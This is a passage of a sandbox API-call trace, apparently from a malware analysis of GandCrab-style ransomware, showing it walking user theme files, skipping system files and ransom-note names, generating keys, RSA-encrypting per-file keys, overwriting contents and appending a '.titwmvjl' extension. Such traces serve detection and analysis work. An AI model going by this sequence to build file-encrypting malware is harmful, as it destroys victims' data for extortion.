(lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03090430[[fn=Banded]].thmx") returned 130 [0073.981] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03090430[[fn=Banded]].thmx") returned 130 [0073.981] lstrcmpiW (lpString1="TM03090430[[fn=Banded]].thmx", lpString2="desktop.ini") returned 1 [0073.981] lstrcmpiW (lpString1="TM03090430[[fn=Banded]].thmx", lpString2="autorun.inf") returned 1 [0073.981] lstrcmpiW (lpString1="TM03090430[[fn=Banded]].thmx", lpString2="ntuser.dat") returned 1 [0073.981] lstrcmpiW (lpString1="TM03090430[[fn=Banded]].thmx", lpString2="iconcache.db") returned 1 [0073.981] lstrcmpiW (lpString1="TM03090430[[fn=Banded]].thmx", lpString2="bootsect.bak") returned 1 [0073.981] lstrcmpiW (lpString1="TM03090430[[fn=Banded]].thmx", lpString2="boot.ini") returned 1 [0073.981] lstrcmpiW (lpString1="TM03090430[[fn=Banded]].thmx", lpString2="ntuser.dat.log") returned 1 [0073.981] lstrcmpiW (lpString1="TM03090430[[fn=Banded]].thmx", lpString2="thumbs.db") returned 1 [0073.981] lstrcmpiW (lpString1="TM03090430[[fn=Banded]].thmx", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0073.981] lstrcmpiW (lpString1="TM03090430[[fn=Banded]].thmx", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0073.981] lstrcmpiW (lpString1="TM03090430[[fn=Banded]].thmx", lpString2="KRAB-DECRYPT.html") returned 1 [0073.981] lstrcmpiW (lpString1="TM03090430[[fn=Banded]].thmx", lpString2="CRAB-DECRYPT.html") returned 1 [0073.981] lstrcmpiW (lpString1="TM03090430[[fn=Banded]].thmx", lpString2="KRAB-DECRYPT.txt") returned 1 [0073.981] lstrcmpiW (lpString1="TM03090430[[fn=Banded]].thmx", lpString2="CRAB-DECRYPT.txt") returned 1 [0073.981] lstrcmpiW (lpString1="TM03090430[[fn=Banded]].thmx", lpString2="ntldr") returned 1 [0073.981] lstrcmpiW (lpString1="TM03090430[[fn=Banded]].thmx", lpString2="NTDETECT.COM") returned 1 [0073.981] lstrcmpiW (lpString1="TM03090430[[fn=Banded]].thmx", lpString2="Bootfont.bin") returned 1 [0073.981] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03090430[[fn=Banded]].thmx") returned 130 [0073.981] lstrlenW (lpString=".thmx") returned 5 [0073.981] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0073.981] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".thmx ") returned 6 [0073.981] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.981] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0073.982] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03090430[[fn=Banded]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03090430[[fn=banded]].thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ec [0073.983] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.983] ReadFile (in: hFile=0x2ec, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259dfd0*=0x21c, lpOverlapped=0x0) returned 1 [0073.984] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.984] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.984] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0073.984] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0073.985] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0073.985] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0073.985] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259df8c | out: pbBuffer=0x259df8c) returned 1 [0073.985] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.985] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0073.985] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.985] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.985] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0073.986] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0073.986] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0073.986] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0073.986] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259dfac | out: pbBuffer=0x259dfac) returned 1 [0073.986] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.986] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0073.986] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.987] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.987] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0073.987] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.987] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x5033f8) returned 1 [0073.988] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.988] CryptGetKeyParam (in: hKey=0x5033f8, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0073.988] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.988] CryptEncrypt (in: hKey=0x5033f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259df24*=0x100) returned 1 [0073.988] GetLastError () returned 0x0 [0073.988] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.988] CryptDestroyKey (hKey=0x5033f8) returned 1 [0073.988] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.988] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0073.988] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.989] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0073.989] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.989] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x5037f8) returned 1 [0073.989] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.989] CryptGetKeyParam (in: hKey=0x5037f8, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0073.989] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.989] CryptEncrypt (in: hKey=0x5037f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259df24*=0x100) returned 1 [0073.990] GetLastError () returned 0x0 [0073.990] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.990] CryptDestroyKey (hKey=0x5037f8) returned 1 [0073.990] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0073.990] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0073.990] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0073.990] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0073.990] ReadFile (in: hFile=0x2ec, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259dfd0*=0x893c1, lpOverlapped=0x0) returned 1 [0074.023] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfff76c3f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.023] WriteFile (in: hFile=0x2ec, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x893c1, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259dfb4*=0x893c1, lpOverlapped=0x0) returned 1 [0074.035] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.035] WriteFile (in: hFile=0x2ec, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259dfb4*=0x21c, lpOverlapped=0x0) returned 1 [0074.036] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.040] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.042] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.042] CloseHandle (hObject=0x2ec) returned 1 [0074.051] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03090430[[fn=Banded]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03090430[[fn=banded]].thmx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03090430[[fn=Banded]].thmx.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03090430[[fn=banded]].thmx.titwmvjl"), dwFlags=0x1) returned 1 [0074.052] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.052] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0074.052] lstrcmpW (lpString1="TM03090434[[fn=Wood Type]].thmx", lpString2=".") returned 1 [0074.052] lstrcmpW (lpString1="TM03090434[[fn=Wood Type]].thmx", lpString2="..") returned 1 [0074.052] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\", lpString2="TM03090434[[fn=Wood Type]].thmx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03090434[[fn=Wood Type]].thmx") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03090434[[fn=Wood Type]].thmx" [0074.052] lstrlenW (lpString=".titwmvjl") returned 9 [0074.052] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03090434[[fn=Wood Type]].thmx") returned 133 [0074.052] VirtualAlloc (lpAddress=0x0, dwSize=0x14a, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0074.052] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03090434[[fn=Wood Type]].thmx.titwmvjl") returned 142 [0074.052] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03090434[[fn=Wood Type]].thmx") returned 133 [0074.052] lstrlenW (lpString=".thmx") returned 5 [0074.052] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0074.053] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".thmx ") returned 6 [0074.053] lstrcmpiW (lpString1=".thmx", lpString2=".titwmvjl") returned -1 [0074.053] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.053] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03090434[[fn=Wood Type]].thmx") returned 133 [0074.053] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03090434[[fn=Wood Type]].thmx") returned 133 [0074.053] lstrcmpiW (lpString1="TM03090434[[fn=Wood Type]].thmx", lpString2="desktop.ini") returned 1 [0074.053] lstrcmpiW (lpString1="TM03090434[[fn=Wood Type]].thmx", lpString2="autorun.inf") returned 1 [0074.053] lstrcmpiW (lpString1="TM03090434[[fn=Wood Type]].thmx", lpString2="ntuser.dat") returned 1 [0074.053] lstrcmpiW (lpString1="TM03090434[[fn=Wood Type]].thmx", lpString2="iconcache.db") returned 1 [0074.053] lstrcmpiW (lpString1="TM03090434[[fn=Wood Type]].thmx", lpString2="bootsect.bak") returned 1 [0074.053] lstrcmpiW (lpString1="TM03090434[[fn=Wood Type]].thmx", lpString2="boot.ini") returned 1 [0074.053] lstrcmpiW (lpString1="TM03090434[[fn=Wood Type]].thmx", lpString2="ntuser.dat.log") returned 1 [0074.053] lstrcmpiW (lpString1="TM03090434[[fn=Wood Type]].thmx", lpString2="thumbs.db") returned 1 [0074.053] lstrcmpiW (lpString1="TM03090434[[fn=Wood Type]].thmx", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0074.053] lstrcmpiW (lpString1="TM03090434[[fn=Wood Type]].thmx", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0074.053] lstrcmpiW (lpString1="TM03090434[[fn=Wood Type]].thmx", lpString2="KRAB-DECRYPT.html") returned 1 [0074.053] lstrcmpiW (lpString1="TM03090434[[fn=Wood Type]].thmx", lpString2="CRAB-DECRYPT.html") returned 1 [0074.053] lstrcmpiW (lpString1="TM03090434[[fn=Wood Type]].thmx", lpString2="KRAB-DECRYPT.txt") returned 1 [0074.053] lstrcmpiW (lpString1="TM03090434[[fn=Wood Type]].thmx", lpString2="CRAB-DECRYPT.txt") returned 1 [0074.053] lstrcmpiW (lpString1="TM03090434[[fn=Wood Type]].thmx", lpString2="ntldr") returned 1 [0074.053] lstrcmpiW (lpString1="TM03090434[[fn=Wood Type]].thmx", lpString2="NTDETECT.COM") returned 1 [0074.053] lstrcmpiW (lpString1="TM03090434[[fn=Wood Type]].thmx", lpString2="Bootfont.bin") returned 1 [0074.053] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03090434[[fn=Wood Type]].thmx") returned 133 [0074.053] lstrlenW (lpString=".thmx") returned 5 [0074.053] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0074.053] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".thmx ") returned 6 [0074.054] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.054] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0074.054] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03090434[[fn=Wood Type]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03090434[[fn=wood type]].thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ec [0074.054] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.054] ReadFile (in: hFile=0x2ec, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259dfd0*=0x21c, lpOverlapped=0x0) returned 1 [0074.068] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.068] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.068] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0074.069] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0074.069] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0074.069] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0074.069] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259df8c | out: pbBuffer=0x259df8c) returned 1 [0074.069] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.069] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0074.069] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.070] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.070] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0074.070] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0074.070] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0074.070] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0074.070] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259dfac | out: pbBuffer=0x259dfac) returned 1 [0074.070] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.071] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0074.071] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.071] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.071] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0074.071] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.071] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x503938) returned 1 [0074.071] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.072] CryptGetKeyParam (in: hKey=0x503938, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0074.072] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.072] CryptEncrypt (in: hKey=0x503938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259df24*=0x100) returned 1 [0074.072] GetLastError () returned 0x0 [0074.072] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.072] CryptDestroyKey (hKey=0x503938) returned 1 [0074.072] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.072] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0074.072] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.072] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0074.073] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.073] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x5033f8) returned 1 [0074.073] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.073] CryptGetKeyParam (in: hKey=0x5033f8, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0074.073] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.073] CryptEncrypt (in: hKey=0x5033f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259df24*=0x100) returned 1 [0074.073] GetLastError () returned 0x0 [0074.074] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.074] CryptDestroyKey (hKey=0x5033f8) returned 1 [0074.074] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0074.074] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0074.074] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0074.074] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0074.074] ReadFile (in: hFile=0x2ec, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259dfd0*=0x100000, lpOverlapped=0x0) returned 1 [0074.118] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.118] WriteFile (in: hFile=0x2ec, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259dfb4*=0x100000, lpOverlapped=0x0) returned 1 [0074.129] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.130] WriteFile (in: hFile=0x2ec, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259dfb4*=0x21c, lpOverlapped=0x0) returned 1 [0074.131] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.135] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.138] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.138] CloseHandle (hObject=0x2ec) returned 1 [0074.165] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03090434[[fn=Wood Type]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03090434[[fn=wood type]].thmx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03090434[[fn=Wood Type]].thmx.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03090434[[fn=wood type]].thmx.titwmvjl"), dwFlags=0x1) returned 1 [0074.166] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.166] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0074.166] lstrcmpW (lpString1="TM03457444[[fn=Basis]].thmx", lpString2=".") returned 1 [0074.166] lstrcmpW (lpString1="TM03457444[[fn=Basis]].thmx", lpString2="..") returned 1 [0074.166] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\", lpString2="TM03457444[[fn=Basis]].thmx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457444[[fn=Basis]].thmx") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457444[[fn=Basis]].thmx" [0074.166] lstrlenW (lpString=".titwmvjl") returned 9 [0074.166] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457444[[fn=Basis]].thmx") returned 129 [0074.166] VirtualAlloc (lpAddress=0x0, dwSize=0x142, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0074.166] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457444[[fn=Basis]].thmx.titwmvjl") returned 138 [0074.166] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457444[[fn=Basis]].thmx") returned 129 [0074.166] lstrlenW (lpString=".thmx") returned 5 [0074.166] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0074.167] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".thmx ") returned 6 [0074.167] lstrcmpiW (lpString1=".thmx", lpString2=".titwmvjl") returned -1 [0074.167] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.167] lstrlenW 